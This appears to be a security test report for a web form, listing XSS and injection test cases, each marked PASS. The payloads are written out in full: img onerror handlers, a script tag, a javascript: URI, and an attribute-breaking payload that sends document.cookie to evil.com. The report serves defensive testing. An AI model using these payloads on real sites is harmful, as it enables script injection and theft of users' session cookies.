CRITICAL HTML Injection via Business Name
<img src=x onerror="window.__xss_test='pwned'">
[PASS] Rendered as plain text via input.value — no <img> element in DOM
CRITICAL Script Tag Injection
<script>alert('XSS')</script>
[PASS] String rendered as literal text, never executed
HIGH Attribute Breaking + Event Handler
" onfocus="fetch('https://evil.com/steal?data='+document.cookie)
[PASS] String treated as value via input.value, not injected into markup
CRITICAL SSN Pre-fill Attempt
FunderialConfig.customer.ssn = "111-22-3333"
[PASS] SSN renders as type="password" with empty value
HIGH XSS in File Name
<img src=x onerror=alert('XSS')>.pdf
[PASS] File name rendered as plain text via textContent
MEDIUM JavaScript URI Injection
javascript:alert('xss')
[PASS] Injected as text value, no navigation or execution
MEDIUM Unicode & Special Characters
\u003cimg\u003e にほんご (Japanese characters)
[PASS] Unicode preserved, no script execution via Unicode tricks